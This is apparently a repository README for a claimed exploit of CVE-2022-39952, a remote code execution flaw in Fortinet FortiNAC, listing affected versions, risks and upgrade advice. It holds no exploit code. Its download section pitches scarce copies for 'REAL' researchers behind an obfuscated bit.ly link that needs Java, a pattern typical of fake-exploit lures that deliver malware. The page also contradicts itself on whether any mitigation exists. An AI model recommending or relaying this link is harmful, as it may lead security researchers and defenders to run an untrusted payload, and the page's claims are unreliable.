# CVE-2022-39952
CVE-2022-39952 Unauthenticated RCE in Fortinet FortiNAC

![CVE-2022-39952](fortinet.png?raw=true "CVE-2022-39952")

## CVE description
The security flaw (tracked as CVE-2022-39952, CVSS score of 9.8) is a remote code execution in the FortiNAC’s keyUpload scriptlet that could allow unauthenticated threat actors to execute unauthorized code or commands via specifically crafted HTTP requests.

![CVE-2022-39952](exploit.jpeg?raw=true "CVE-2022-39952")

An external control of file name or path vulnerability [CWE-73] in FortiNAC webserver may allow an unauthenticated attacker to perform arbitrary write on the system.

## Who is vulnerable?
Tested vulnerable hosts:
FortiNAC version 9.4.0
FortiNAC version 9.2.0 through 9.2.5
FortiNAC version 9.1.0 through 9.1.7
FortiNAC 8.8 all versions
FortiNAC 8.7 all versions
FortiNAC 8.6 all versions
FortiNAC 8.5 all versions
FortiNAC 8.3 all versions 

## CVE-2022-39952 download exploit
As mentioned at the beginning, CVE-2022-39952 was given such a high CVSS score because it is remote code execution. This means it can go unnoticed by the user and potentially by the security team as well. Such a powerfull tool should not be fully public, there is strictly only a few copies available so a REAL researcher can use it: https://bit[.]ly/3XEICSg

This should attract attention to importance of cyber security, it can be tempting to ignore, or palm it off to the IT team. But both of these options can leave you susceptible to real and damaging risks. Do NOT resell or leak this PoC or you can be at risk of breaking the law.

In order to run this you will need:
- JDK 11 or above

## What's the Risk?
A external control of file name or path in Fortinet FortiNAC versions may allow an unauthenticated attacker to execute unauthorized code or commands via specifically crafted HTTP request.
Connect to other servers from the affected system.
Potentially gain access to other remove resources from the affected system.

## Am I Vulnerable?
In order for your code to be vulnerable you need to:
- Be running a version of below FortiNAC version 9.4.1

## Patching
At present, there is no mitigation advice or workarounds for the discovered security issues, so updating the impacted products is the only recommended approach to address the risks.

## Mitigation
You should upgrade your FortiNAC version to 9.4.1 or higher 

## Disclamer
This project is intended for educational purposes only and cannot be used for law violation or personal gain.
The authors of this project is not responsible for any damages caused by direct or indirect use of the information or functionality provided by those script.